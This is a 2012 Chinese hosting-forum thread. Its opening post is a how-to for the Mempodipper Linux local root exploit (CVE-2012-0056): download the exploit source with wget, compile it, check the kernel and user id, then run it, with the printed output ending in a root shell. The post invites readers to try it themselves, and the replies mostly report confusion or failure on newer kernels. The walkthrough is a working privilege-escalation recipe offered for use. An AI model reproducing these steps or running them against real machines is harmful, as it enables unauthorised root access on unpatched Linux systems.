全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1068|回复: 12
打印 上一主题 下一主题

[疑问] Linux 2.6.39 到 3.2.0 爆提权漏洞

[复制链接]
1#
发表于 2012-3-8 18:42:52 | 只看该作者
2#
 楼主| 发表于 2012-3-8 18:41:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.下载漏洞利用文件


wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行
netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
sh-4.2#

效果自测!
3#
发表于 2012-3-8 18:42:53 | 只看该作者
本帖最后由 mj_japen 于 2012-3-8 18:43 编辑

各种平台 本地提权就一直没断过
4#
发表于 2012-3-8 18:42:56 | 只看该作者
详细说一说啊,看不懂的
5#
发表于 2012-3-8 18:43:38 | 只看该作者
什么玩意,用一件包的人表示看不懂
6#
发表于 2012-3-8 19:07:46 | 只看该作者
debian testing
kernel 3.1.0失败
7#
发表于 2012-3-8 20:22:04 | 只看该作者
arch
3.2.8 失败……是必然的
suzizi 该用户已被删除
8#
发表于 2012-3-8 20:24:10 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
9#
发表于 2012-3-8 20:27:31 | 只看该作者
omg
10#
发表于 2012-3-8 20:31:23 | 只看该作者
玩不懂。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-1-14 23:06 , Processed in 0.071898 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表